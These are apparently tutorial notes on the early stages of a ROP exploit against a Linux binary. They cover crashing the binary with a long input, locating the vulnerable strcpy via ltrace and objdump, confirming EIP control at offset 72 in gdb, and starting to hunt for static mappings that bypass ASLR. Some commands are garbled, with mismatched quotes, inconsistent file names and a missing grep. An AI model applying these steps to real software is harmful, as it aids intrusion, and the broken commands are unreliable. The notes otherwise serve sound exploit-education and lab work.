ROP Finding the vulnerable function

• At this point you have been able to generate a crash on a linux binary. We now need to find the vulnerable function before progressing

# creating the crash 
python3 -c 'print("A"*100) > temp.txt
./binary file.txt

Segmentation fault

• use ltrace to see if there is a function that is causing the crash

ltrace ./binary file.txt 2>&1 | grep SIGSEGV -B1
7120-strcpy(0x6fff3b10, "AAAAAAAAAAAAAAAAAA"...) = 0x2ffff108b
--snip--

• we can see that strcpy is the issue here causing the crash

• use objdump to see where in the code segment strcpy() is called.

• Look at the GOT of the program and grep for strcpy()

• Then use the objdump tool to specifically query the .plt segment to see where the address in the GOT is referenced.

• After attaining the address use objdump tool once more and change the segment to .text and grep on the address shown in the PLT

objdump -R ./binary | grep strcpy
0304b00a R_386_JUMP_SLOT    strcpy
objdump -j .plt -d binary | grep b00a
70482b7:  ff 25 0a b0 04 03 jmp  *0x0304b00a 
objdump -j .text -d binary | 82b7 -B2 -A2
# you will see the vuln buffer size
# the address of strcpy@plt
# and a ret which is a good spot for a break to see 
# if your payload was successfully copied into mem 

• to validate your finding see if your buffer analysis was correct (72)

python3 -c print("A"*72 + "BBBB") > temp.txt
gdb ./binary 
run temp.txt
Program recieved signal SIGSEGV, Segmentation fault
0x42424242 in ?? ()

Find static addresses

• We need to find static memory locations as ASLR will be enabled on modern systems.

• There may be static regions that do not utilize ASLR

• There could be static mappings due to any third party programs that get mapped into our program

• use ltrace to find the static mappings

ltrace ./binary file.txt 2>&1 | egrep -i 'mmap|open'

• look for any shared object that is mmap into the binary

• should see an open() call followed by a mmap() with a memory address passed into mmap()